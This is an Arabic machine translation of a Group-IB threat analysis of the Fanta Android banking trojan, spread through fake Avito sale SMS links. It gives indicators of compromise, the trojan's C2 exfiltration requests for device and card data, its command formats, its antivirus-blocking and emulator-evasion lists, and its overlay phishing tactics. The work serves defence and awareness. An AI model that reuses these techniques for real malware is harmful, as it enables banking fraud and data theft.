🌑 🗝️ 🌊 ليسيا ، فانتا: تكتيك جديد لنظام طروادة أندرويد القديم 🧑🏽 👍🏼 🔥

بمجرد رغبتك في بيع شيء ما على Avito ، وبعد وضع وصف تفصيلي لمنتجك (على سبيل المثال ، وحدة ذاكرة الوصول العشوائي) ، ستصلك هذه الرسالة:

عندما تفتح الرابط ، سترى صفحة غير ضارة إلى حد ما تُعلمك ، البائع السعيد والناجح ، بعملية الشراء:

بعد النقر فوق الزر "متابعة" ، سيتم تنزيل ملف APK مع الرمز واسم موثوق به على جهاز Android الخاص بك. قمت بتثبيت تطبيق طلب لسبب من حقوق AccessibilityService ، ثم ظهر عدد من النوافذ واختفت بسرعة و ... هذا كل شيء.

أتيت للتحقق من رصيدك ، ولكن لسبب ما طلب طلبك المصرفي مرة أخرى للحصول على تفاصيل بطاقتك. بعد إدخال البيانات ، يحدث شيء فظيع: لسبب غير واضح حتى الآن ، يبدأ المال في الاختفاء من حسابك. أنت تحاول حل المشكلة ، لكن هاتفك يقاوم: إنه يضغط على مفتاحي "Back" و "Home" ، ولا يتم إيقاف تشغيله ولا يسمح بتنشيط أي حماية. نتيجة لذلك ، تُترك بدون نقود ، ولم يتم شراء البضائع الخاصة بك ، أنت مرتبك وتتساءل: ماذا حدث؟

الجواب بسيط: أنت ضحية لنظام Android Trojan Fanta ، عائلة Flexnet. كيف حدث ذلك؟ سنشرح الآن.

المؤلفون: أندري بولوفينكين ، أخصائي مبتدئ في تحليل الشفرات الخبيثة ، إيفان بيساريف ، أخصائي تحليل الشفرات الخبيثة.

بعض الإحصاءات

لأول مرة ، أصبحت عائلة Flexnet Android Trojan معروفة في عام 2015. على مدى فترة طويلة من النشاط ، توسعت الأسرة لتشمل العديد من الأنواع الفرعية: فانتا ، ليمبوت ، ليبتون ، إلخ. لا تبقى طروادة ، وكذلك البنية التحتية المرتبطة بها ، قائمة: يتم تطوير مخططات توزيع فعالة جديدة - في حالتنا ، صفحات تصيد عالية الجودة تستهدف بائع محدد ، ويتبع مطورو طروادة اتجاهات الموضة في كتابة الفيروسات - إضافة ميزات جديدة تسمح للسرقة بشكل أكثر فعالية الأموال من الأجهزة المصابة وتجاوز آليات الحماية.

تستهدف الحملة الموضحة في هذه المقالة المستخدمين من روسيا ، وتم اكتشاف عدد صغير من الأجهزة المصابة في أوكرانيا ، وحتى عدد أقل في كازاخستان وروسيا البيضاء.

على الرغم من حقيقة أن Flexnet كانت في ساحة Android Trojans منذ أكثر من 4 سنوات وتم دراستها بالتفصيل من قبل العديد من الباحثين ، إلا أنها لا تزال في حالة جيدة. بدءًا من يناير 2019 ، يبلغ مقدار الضرر المحتمل أكثر من 35 مليون روبل - وهذا ينطبق فقط على الحملات في روسيا. في عام 2015 ، تم بيع إصدارات مختلفة من طروادة Android هذه في منتديات تحت الأرض ، حيث يمكن أيضًا العثور على الكود المصدري للحصان طروادة مع وصف تفصيلي. وهذا يعني أن إحصائيات الضرر في العالم أكثر إثارة للإعجاب. مؤشر جيد لمثل هذا الرجل العجوز ، أليس كذلك؟

من البيع إلى الغش

كما ترون من لقطة شاشة لصفحة التصيد لخدمة الإنترنت لوضع إعلانات Avito المقدمة مسبقًا ، فقد تم إعدادها لضحية معينة. على ما يبدو ، يستخدم المهاجمون أحد موزعي Avito ، وسحب رقم الهاتف واسم البائع ، بالإضافة إلى وصف للمنتج. بعد توسيع الصفحة وإعداد ملف APK ، يتم إرسال رسالة نصية قصيرة إلى الضحية باسمه ورابطًا إلى صفحة التصيّد التي تحتوي على وصف لمنتجها والمبلغ المستلم من "بيع" المنتج. بالنقر فوق الزر ، يتلقى المستخدم ملف APK ضار - فانتا.

أظهر فحص نطاق shcet491 [.] رو أنه تم تفويضه إلى خوادم DNS Hostinger:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

يحتوي ملف منطقة المجال على إدخالات تشير إلى عناوين IP 31.220.23 [.] 236 و 31.220.23 [.] 243 و 31.220.23 [.] 235. ومع ذلك ، يشير سجل مورد المجال الرئيسي (سجل) إلى خادم له عنوان IP يبلغ 178.132.1 [.] 240.

يقع عنوان IP 178.132.1 [.] 240 في هولندا وينتمي إلى مضيف WorldStream. عناوين IP 31.220.23 [.] 235 ، 31.220.23 [.] 236 و 31.220.23 [.] 243 تقع في المملكة المتحدة وتنتمي إلى خادم الاستضافة المشترك HOSTINGER. يستخدم Openprov-ru كمسجل. تم حل النطاقات التالية أيضًا إلى عنوان IP 178.132.1 [.] 240:

sdelka-ru [.] رو
tovar-av [.] رو
av-tovar [.] رو
رو-sdelka [.] رو
shcet382 [.] رو
sdelka221 [.] رو
sdelka211 [.] رو
vyplata437 [.] رو
viplata291 [.] رو
perevod273 [.] رو
perevod901 [.] رو

تجدر الإشارة إلى أن جميع المجالات تقريبًا بها روابط بالتنسيق التالي:

http: // (www.) {0،1} <٪ domain٪> / [0-9] {7}

يندرج رابط من رسالة SMS أيضًا تحت هذا القالب. وفقًا للبيانات التاريخية ، وجد أن أحد الروابط يتوافق مع عدة روابط وفقًا للقالب أعلاه ، مما يشير إلى استخدام مجال واحد لتوزيع حصان طروادة على العديد من الضحايا.

دعنا ننتقل قليلا: كخادم تحكم ، طروادة تحميلها عبر وصلة من SMS يستخدم العنوان onuseseddohap [.] النادي . تم تسجيل هذا النطاق في 2019-03-12 ، بدءًا من 2019-04-29 ، تفاعلت تطبيقات APK مع هذا النطاق. بناءً على البيانات الواردة من VirusTotal ، تفاعل ما مجموعه 109 تطبيقات مع هذا الخادم. تم حل النطاق نفسه لعنوان IP 217.23.14 [.] 27 ، الموجود في هولندا ومملوك من قبل مضيف WorldStream. يتم استخدام namecheap كمسجل. المجالات سيئة الراكون [.] نادي (بدءا من 2018-09-25) وسوء الراكون [.] لايف (بدءا من 2018-10-25) حل أيضا إلى عنوان IP هذا. تفاعل أكثر من 80 ملفًا من ملفات APK مع نطاق النادي السيئة racoon [.] ، وتفاعل أكثر من 100 ملف مع المجال السيئة [.]

بشكل عام ، تقدم الهجوم كما يلي:

ماذا لديها فانتا تحت غطاء محرك السيارة؟

مثل العديد من أحصنة طروادة Android الأخرى ، فإن Fanta قادر على قراءة وإرسال رسائل SMS ، وتقديم طلبات USSD ، وإظهار النوافذ الخاصة به على رأس التطبيقات (بما في ذلك الخدمات المصرفية). ومع ذلك ، وصلت ترسانة وظائف هذه العائلة: بدأت فانتا باستخدام AccessibilityService لأغراض مختلفة: قراءة محتويات الإشعارات من التطبيقات الأخرى ، ومنع اكتشاف وإيقاف تنفيذ طروادة على جهاز مصاب ، إلخ. فانتا يعمل على جميع إصدارات أندرويد لا تقل عن 4.4. في هذه المقالة ، سوف نلقي نظرة فاحصة على نموذج فانتا التالي:

MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

مباشرة بعد الاطلاق

مباشرة بعد الإطلاق ، يخفي طروادة أيقونه. لا يمكن تشغيل التطبيق إلا في حالة عدم وجود اسم الجهاز المصاب في القائمة:

android_x86
فيرتثلبوإكس
Nexus 5X (رأس ثور)
Nexus 5 (الشفرة)

يتم إجراء هذا الاختيار في الخدمة الرئيسية في Trojan - MainService . في البداية ، تتم تهيئة معلمات التكوين الخاصة بالتطبيق باستخدام القيم الافتراضية (سيتم تنسيق تنسيق تخزين بيانات التكوين وقيمتها لاحقًا) ، بالإضافة إلى تسجيل جهاز مصاب جديد على خادم الإدارة. سيتم إرسال طلب HTTP POST إلى الخادم مع نوع رسالة register_bot ومعلومات حول الجهاز المصاب (إصدار Android و IMEI ورقم الهاتف واسم المشغل ورمز البلد الخاص بالمشغل الذي تم تسجيله فيه). عنوان الخادم هو hXXp: // onuseseddohap [.] Club / controller.php . استجابة لذلك ، يرسل الخادم رسالة تحتوي على الحقول bot_id ، bot_pwd ، الخادم - يحفظ التطبيق هذه القيم كمعلمات لخادم CnC. معلمة الخادم اختيارية إذا لم يتم استلام الحقل: تستخدم فانتا عنوان التسجيل - hXXp: // onuseseddohap [.] Club / controller.php . يمكن استخدام وظيفة تغيير عنوان CnC لحل مشكلتين: توزيع الحمولة بالتساوي بين عدة خوادم (مع وجود عدد كبير من الأجهزة المصابة ، يمكن أن يكون التحميل على خادم ويب غير محسّن مرتفعًا) ، وكذلك لاستخدام خادم بديل في حالة فشل أحد خوادم CnC .

في حالة حدوث خطأ أثناء إرسال الطلب ، ستعيد طروادة تكرار عملية التسجيل بعد 20 ثانية.

بعد تسجيل الجهاز بنجاح ، ستقوم فانتا بعرض الرسالة التالية للمستخدم:

ملاحظة مهمة: الخدمة المسماة System Security هي اسم خدمة Trojan ، وبعد النقر فوق الزر " موافق" ، يتم فتح نافذة باستخدام إعدادات إمكانية الوصول للجهاز المصاب ، حيث يجب على المستخدم إصدار حقوق إمكانية الوصول للخدمة الضارة:

بمجرد أن يقوم المستخدم بتشغيل AccessibilityService ، تحصل Fanta على إمكانية الوصول إلى محتويات نوافذ التطبيق والإجراءات التي يتم تنفيذها فيها:

فور الحصول على حقوق إمكانية الوصول ، يطلب طروادة حقوق المسؤول وحق قراءة الإخطارات:

باستخدام AccessibilityService ، يحاكي التطبيق ضغطات المفاتيح ، وبالتالي يمنح نفسه جميع الحقوق اللازمة.

تنشئ Fanta العديد من مثيلات قاعدة البيانات (التي سيتم وصفها لاحقًا) والتي تعد ضرورية لحفظ بيانات التكوين ، بالإضافة إلى معلومات حول الجهاز المصاب الذي تم جمعه أثناء العملية. لإرسال المعلومات التي تم جمعها ، يقوم طروادة بإنشاء مهمة مكررة مصممة لتفريغ الحقول من قاعدة البيانات واستلام أمر من خادم التحكم. يتم تعيين الفاصل الزمني للوصول إلى CnC اعتمادًا على إصدار Android: في حالة 5.1 ، ستكون الفاصل الزمني 10 ثوانٍ ، وإلا 60 ثانية.

لاستلام أمر ، تقدم Fanta طلب GetTask إلى خادم الإدارة. استجابةً لذلك ، يمكن لـ CnC إرسال أحد الأوامر التالية:

الفريق	وصف
0	إرسال الرسائل القصيرة
1	قم بإجراء مكالمة هاتفية أو أمر USSD
2	تحديث المعلمة الفاصل
3	تحديث المعلمة التقاطع
6	تحديثات smsManager
9	ابدأ في جمع رسائل SMS
11	إعادة ضبط الهاتف على إعدادات المصنع
12	تمكين / تعطيل تسجيل إنشاء مربع الحوار

تقوم فانتا أيضًا بجمع الإخطارات من 70 تطبيقًا بنكيًا وأنظمة دفع سريعة ومحافظ إلكترونية وتخزينها في قاعدة بيانات.

إعدادات التكوين التخزين

لتخزين معلمات التكوين ، يستخدم Fanta النهج القياسي لنظام Android - ملفات التفضيلات . سيتم حفظ الإعدادات في ملف يسمى الإعدادات . وصف المعلمات المحفوظة في الجدول أدناه.

الاسم الأول	القيمة الافتراضية	القيم الممكنة	وصف
الهوية	0	عدد صحيح	معرف بوت
الخادم	hXXp: // onuseseddohap [.] club /	URL	عنوان خادم الإدارة
الأشخاص ذوي الإعاقة	-	سلسلة	كلمة المرور للخادم
الفاصلة	20	عدد صحيح	الفاصل الزمني. يوضح مقدار تأخير المهام التالية: عند إرسال طلب للحصول على حالة رسالة SMS المرسلة تلقي أمر جديد من خادم الإدارة
اعترض	جميع	الكل / رقم الهاتف	إذا كان الحقل مساوياً للسلسلة all أو telNumber ، فسيتم اعتراض التطبيق رسالة SMS المستلمة ولن يتم عرضها للمستخدم
smsManager	0	0/1	قم بتشغيل / إيقاف التطبيق باعتباره مستلم الرسائل القصيرة الافتراضي
readDialog	زائف	صحيح / خطأ	تمكين / تعطيل تسجيل حدث AccessibilityEvent

يستخدم فانتا أيضا ملف smsManager :

الاسم الأول	القيمة الافتراضية	القيم الممكنة	وصف
pckg	-	سلسلة	اسم مدير SMS المستخدم

تفاعل قاعدة البيانات

في عملية عملها ، تستخدم طروادة قاعدتي بيانات. يتم استخدام قاعدة بيانات تسمى a لتخزين المعلومات المختلفة التي يتم جمعها من الهاتف. تسمى قاعدة البيانات الثانية fanta.db ويتم استخدامها لحفظ الإعدادات المسؤولة عن إنشاء إطارات خداع مصممة لجمع معلومات حول البطاقات المصرفية.

يستخدم Trojan قاعدة بيانات لتخزين المعلومات التي يجمعها وتسجيل إجراءاتها. يتم تخزين البيانات في جدول السجلات . لإنشاء جدول ، استخدم استعلام SQL التالي:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

تحتوي قاعدة البيانات على المعلومات التالية:

1. تسجيل الدخول لإدراج جهاز مصاب مع رسالة الهاتف قيد التشغيل!

2. الإخطارات من التطبيقات. يتم تشكيل الرسالة وفقًا للقالب التالي:

 (<%App Name%>)<%Title%>: <%Notification text%>

3. بيانات البطاقة المصرفية من أشكال التصيد طروادة. يمكن أن تكون معلمة VIEW_NAME واحدة من القائمة:

ALIEXPRESS
Avito
جوجل اللعب
متفرقات <٪ اسم التطبيق٪>

تم تسجيل الرسالة بالتنسيق:

 [<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>)  :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. رسائل SMS الواردة / الصادرة بالتنسيق:

 ([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%>

5. معلومات حول الحزمة التي تنشئ مربع الحوار بالتنسيق:

 (<%Package name%>)<%Package information%>

جدول سجلات المثال:

واحدة من ميزات فانتا هي جمع معلومات البطاقة المصرفية. يحدث جمع البيانات بسبب إنشاء نوافذ الخداع عند فتح التطبيقات المصرفية. طروادة يخلق نافذة التصيد مرة واحدة فقط. يتم تخزين المعلومات التي تم عرضها على النافذة للمستخدم في جدول الإعدادات في قاعدة بيانات fanta.db . يتم استخدام استعلام SQL التالي لإنشاء قاعدة البيانات:

 create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

تتم تهيئة جميع حقول جدول الإعدادات افتراضيًا إلى 1 (إنشاء نافذة تصيد احتيالي). بعد إدخال المستخدم لبياناته ، سيتم تعيين القيمة على 0. مثال على حقول جدول الإعدادات :

can_login - الحقل مسؤول عن عرض النموذج عند فتح تطبيق مصرفي
first_bank - غير مستخدم
can_avito - الحقل مسؤول عن عرض النموذج عند فتح تطبيق Avito
can_ali - الحقل مسؤول عن عرض النموذج عند فتح تطبيق Aliexpress
can_another - الحقل مسؤول عن عرض النموذج عند فتح أي تطبيق من القائمة: Yula و Pandao و Drome Auto و Wallet. بطاقات الخصم والمكافآت ، Aviasales ، الحجز ، Trivago
can_card - الحقل مسؤول عن عرض النموذج عند فتح Google Play

إدارة خادم التفاعل

يحدث اتصال الشبكة مع خادم الإدارة عبر HTTP. تستخدم فانتا مكتبة Retrofit الشهيرة للعمل مع الشبكة. يتم إرسال الطلبات إلى hXXp: // onuseseddohap [.] Club / controller.php . يمكن تغيير عنوان الخادم أثناء التسجيل على الخادم. قد يأتي ملف تعريف الارتباط من الخادم. تقوم فانتا بتنفيذ طلبات الخادم التالية:

يتم تسجيل الروبوت على خادم الإدارة مرة واحدة في البداية. يتم إرسال البيانات التالية حول الجهاز المصاب إلى الخادم:
· ملفات تعريف الارتباط - ملفات تعريف الارتباط المستلمة من الخادم (القيمة الافتراضية هي سلسلة فارغة)
الوضع - سلسلة ثابتة register_bot
بادئة - عدد صحيح ثابت 2
Version_sdk - تم إنشاؤه بواسطة النمط التالي: <٪ Build.MODEL٪> / <٪ Build.VERSION.RELEASE٪> (Avit)
Imei - IMEI للجهاز المصاب
· رمز البلد للبلد الذي تم تسجيل المشغل فيه ، بتنسيق ISO
رقم - رقم الهاتف
المشغل - اسم المشغل

مثال على الطلب المرسل إلى الخادم:
```
 POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%> 
```
استجابة للطلب ، يجب على الخادم إرجاع كائن JSON يحتوي على المعلمات التالية:
Bot_id - معرف الجهاز المصاب. إذا كان bot_id يساوي 0 ، فستعيد فانتا تنفيذ الطلب.
Bot_pwd - كلمة المرور للخادم.
الخادم - عنوان خادم الإدارة. المعلمة اختياري. إذا لم يتم تحديد المعلمة ، فسيتم استخدام العنوان المخزن في التطبيق.

كائن JSON مثال:
```
 { "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" } 
```

طلب الحصول على أمر من الخادم. يتم إرسال البيانات التالية إلى الخادم:
ملفات تعريف الارتباط - تلقى ملفات تعريف الارتباط من الخادم
معرّف مزايدة للجهاز المصاب الذي تم استلامه عند إرسال طلب register_bot
الأشخاص ذوي الإعاقة - كلمة المرور للخادم
Divice_admin - يحدد الحقل ما إذا كان قد تم الحصول على حقوق المسؤول. إذا تم الحصول على حقوق المسؤول ، يكون الحقل 1 ، وإلا 0
إمكانية الوصول - حالة خدمة الوصول. إذا تم تشغيل الخدمة ، تكون القيمة 1 ، وإلا 0
SMSManager - يوضح ما إذا كان حصان طروادة قيد التشغيل كتطبيق افتراضي لاستلام الرسائل القصيرة
شاشة - يعرض حالة الشاشة. سيتم ضبطه على 1 إذا كانت الشاشة قيد التشغيل ، وإلا 0 ؛

مثال على الطلب المرسل إلى الخادم:
```
 POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%> 
```
بناءً على الأمر ، قد يعرض الخادم كائن JSON بمعلمات مختلفة:

الأمر إرسال رسالة SMS : تحتوي المعلمات على رقم الهاتف ونص رسالة SMS ومعرف الرسالة المراد إرسالها. يتم استخدام المعرف عند إرسال رسالة إلى الخادم بنوع setSmsStatus .
```
 { "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" } 
```
· إجراء مكالمة هاتفية أو أمر USSD : يأتي رقم الهاتف أو الأمر في نص الاستجابة.
```
 { "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" } 
```
قيادة تغيير الفاصل الزمني المعلمة .
```
 { "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" } 
```
تغيير القيادة اعتراض المعلمة .
```
 { "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" } 
```
تغيير SmsManager القيادة الميدانية .
```
 { "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" } 
```
القيادة جمع رسائل SMS من جهاز مصاب .
```
 { "response": [ { "mode": 9 } ], "status":"ok" } 
```
إعادة ضبط الهاتف على أمر إعدادات المصنع :
```
 { "response": [ { "mode": 11 } ], "status":"ok" } 
```
قيادة التغيير ReadDialog المعلمة .
```
 { "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" } 
```

إرسال رسالة مع نوع setSmsStatus . يتم تنفيذ هذا الطلب بعد الأمر Send SMS . الطلب كالتالي:

 POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

تقديم محتوى قاعدة البيانات. لطلب واحد ، ينتقل سطر واحد. يتم إرسال البيانات التالية إلى الخادم:
ملفات تعريف الارتباط - تلقى ملفات تعريف الارتباط من الخادم
وضع سلسلة ثابتة setSaveInboxSms
معرّف مزايدة للجهاز المصاب الذي تم استلامه عند إرسال طلب register_bot
نص - نص في سجل قاعدة البيانات الحالية (الحقل د من جدول السجلات في قاعدة البيانات أ )
· رقم - اسم سجل قاعدة البيانات الحالي (حقل p من سجلات الجدول في قاعدة البيانات أ )
Sms_mode - قيمة عدد صحيح (الحقل m من سجلات الجدول في قاعدة البيانات أ )

الطلب كالتالي:
```
 POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%> 
```
عند الإرسال بنجاح إلى الخادم ، سيتم حذف الصف من الجدول. مثال على كائن JSON الذي تم إرجاعه بواسطة الخادم:
```
 { "response":[], "status":"ok" } 
```

التفاعل مع AccessibilityService

تم تطبيق AccessibilityService لتسهيل استخدام أجهزة Android من قبل الأشخاص ذوي الإعاقة. في معظم الحالات ، مطلوب التفاعل البدني للتفاعل مع التطبيق. يتيح لك AccessibilityService جعلها برمجية. تستخدم فانتا الخدمة لإنشاء نوافذ وهمية في التطبيقات المصرفية ومنع فتح إعدادات النظام وبعض التطبيقات.

باستخدام وظيفة AccessibilityService ، تراقب طروادة التغييرات في العناصر الموجودة على شاشة الجهاز المصاب. كما هو موضح سابقًا ، في إعدادات Fanta هناك معلمة مسؤولة عن عمليات التسجيل باستخدام مربعات الحوار - readDialog . إذا تم تعيين هذه المعلمة ، ستتم إضافة معلومات حول اسم ووصف الحزمة التي أدت إلى الحدث إلى قاعدة البيانات. يقوم طروادة بتنفيذ الإجراءات التالية عندما يتم تشغيل الأحداث:

يحاكي ضربات المفاتيح إلى الخلف والمنزل في حالة:
· إذا أراد المستخدم إعادة تشغيل جهازه
· إذا أراد المستخدم إزالة تطبيق "Avito" أو تغيير حقوق الوصول
· إذا ذكرت الصفحة تطبيق "Avito"
· عند فتح تطبيق "Google Play Protection"
عند فتح الصفحات مع إعدادات AccessibilityService
· عندما يظهر مربع الحوار "أمان النظام"
· عند فتح الصفحة بالإعدادات "سحب التطبيق الآخر"
· عند فتح صفحة "التطبيقات" ، "الاستعادة وإعادة الضبط" ، "إعادة تعيين البيانات" ، "إعدادات إعادة الضبط" ، "لوحة المطورين" ، "خاص". الفرص "،" إمكانية الوصول "،" الحقوق الخاصة "
· إذا تم إنشاء الحدث بواسطة تطبيقات معينة.
قائمة التطبيق
- الروبوت
- سيد لايت
- سيد نظيف
- تنظيف ماستر لوحدة المعالجة المركزية إلى x86
- Meizu Applicatiom إدارة الأذونات
- MIUI الأمن
- نظيف ماجستير - مكافحة الفيروسات وتنظيف ذاكرة التخزين المؤقت وغير المرغوب فيه
- الرقابة الأبوية ونظام تحديد المواقع: Kaspersky SafeKids
- برنامج Kaspersky Antivirus AppLock وأمن الويب التجريبي
- منظف الفيروسات ، مضاد الفيروسات ، منظف (MAX Security)
- Mobile AntiVirus Security PRO
- مضاد الفيروسات أفاست والحماية المجانية 2019
- الأمن المحمول MegaFon
- متوسط الحماية لاريكسون
- الأمن المحمول
- Malwarebytes مكافحة الفيروسات والحماية
- مكافحة الفيروسات على أندرويد 2019
- ماجستير الأمن - مكافحة الفيروسات ، VPN ، AppLock ، الداعم
- AVG antivirus for Huawei System Manager tablet
- وصول سامسونج
- مدير سامسونج الذكي
- سيد الأمن
- سرعة معززة
- برنامج Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web الأمن الفضاء الحياة
- Dr.Web Mobile Control Center
- مكافحة الفيروسات وأمن المحمول
- Kaspersky Internet Security: الحماية من الفيروسات والحماية
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - الحماية والإدارة
- متوسط مكافحة الفيروسات المجاني 2019 - حماية لالروبوت
- مكافحة الفيروسات أندرويد
- نورتون موبايل الأمن ومكافحة الفيروسات
- مكافحة الفيروسات ، وجدار الحماية ، VPN ، الأمن المحمول
- الأمن المحمول: مكافحة الفيروسات ، VPN ، مكافحة السرقة
- مكافحة الفيروسات لالروبوت
إذا تم طلب إذن عند إرسال رسالة نصية قصيرة إلى رقم قصير ، فانتا يقلد النقر على مربع الاختيار تذكر الاختيار وزر الإرسال .
عندما تحاول سحب حقوق المسؤول من طروادة ، فإنها تغلق شاشة الهاتف.
يمنع إضافة مسؤولين جدد.
إذا اكتشف تطبيق مكافحة الفيروسات dr.web تهديدًا ، يقلد فانتا نقرة على زر التجاهل .
طروادة يقلد النقر فوق زر العودة والمنزل إذا تم إنشاء حدث من خلال تطبيق Samsung Device Care .
تقوم Fanta بإنشاء نوافذ تصيد مع نماذج لإدخال معلومات حول البطاقات المصرفية إذا تم تشغيل تطبيق من قائمة تضم حوالي 30 خدمة إنترنت مختلفة. من بينها: AliExpress ، الحجز ، Avito ، Google Play Market Component ، Pandao ، Drome Auto ، إلخ.

أشكال التصيد

فانتا يحلل التطبيقات التي تعمل على الجهاز المصاب. إذا تم فتح تطبيق الاهتمام ، فإن حصان طروادة يعرض نافذة التصيد على رأس جميع الآخرين ، وهو نموذج لإدخال معلومات حول بطاقة مصرفية. يجب على المستخدم إدخال البيانات التالية:
- رقم البطاقة
- تاريخ انتهاء صلاحية البطاقة
- CVV
- اسم حامل البطاقة (ليس لجميع البنوك)
وفقًا للتطبيق الجاري ، سيتم عرض نوافذ خداع مختلفة. فيما يلي أمثلة لبعضها:

ALIEXPRESS:

Avito:

بالنسبة لبعض التطبيقات الأخرى ، مثل Google Play Market و Aviasales و Pandao و booking و Trivago:

كيف كان حقا

لحسن الحظ ، تبين أن الشخص الذي تلقى رسالة SMS الموصوفة في بداية المقال هو متخصص في مجال الأمن السيبراني. لذلك ، تختلف النسخة الحقيقية غير الإرشادية عن الإصدار الذي تم إخباره مسبقًا: حيث تلقى الشخص رسالة قصيرة SMS مثيرة ، وبعد ذلك قدمها لفريق Group-IB Threat Hunting Intelligence. نتيجة الهجوم هذه المقالة. نهاية سعيدة ، أليس كذلك؟ ومع ذلك ، لا تنتهي جميع القصص بشكل جيد ، وحتى لا تبدو قصصك كإصدار توجيهي مع خسارة في المال ، يكفي في معظم الحالات الالتزام بالقواعد التالية الموصوفة منذ فترة طويلة:
- لا تقم بتثبيت تطبيقات لجهاز محمول يعمل بنظام Android OS من أي مصادر أخرى غير Google Play
- عند تثبيت التطبيق ، انتبه بشكل خاص للحقوق التي يطلبها التطبيق
- إيلاء الاهتمام لتمديد الملف
- قم بتثبيت تحديثات نظام التشغيل Android بانتظام
- لا تقم بزيارة الموارد المشبوهة ولا تقم بتنزيل الملفات من هناك
- لا تتبع الروابط المستلمة في رسائل SMS.
Group-IB تعرف كل شيء عن الجريمة السيبرانية ، لكنها تحكي عن الأشياء الأكثر إثارة للاهتمام.

قناة Telegram المزدحمة (https://t.me/Group_IB) حول أمن المعلومات والمتسللين والهجمات الإلكترونية وقراصنة الإنترنت وقراصنة الإنترنت. التحقيق في الجريمة السيبرانية المثيرة عن طريق الخطوات والحالات العملية باستخدام تقنيات Group-IB ، وبطبيعة الحال ، توصيات حول كيفية عدم الوقوع ضحية على الإنترنت.

قناة يوتيوب هنا
Group-IB Photowire on Instagram www.instagram.com/group_ib
تويتر أخبار قصيرة twitter.com/GroupIB

Group-IB هي واحدة من المطورين الرائدين لحلول الكشف عن الهجمات السيبرانية ومنعها واكتشاف الاحتيال وحماية الملكية الفكرية في شبكة مقرها في سنغافورة.

ليسيا ، فانتا: تكتيك جديد لنظام طروادة أندرويد القديم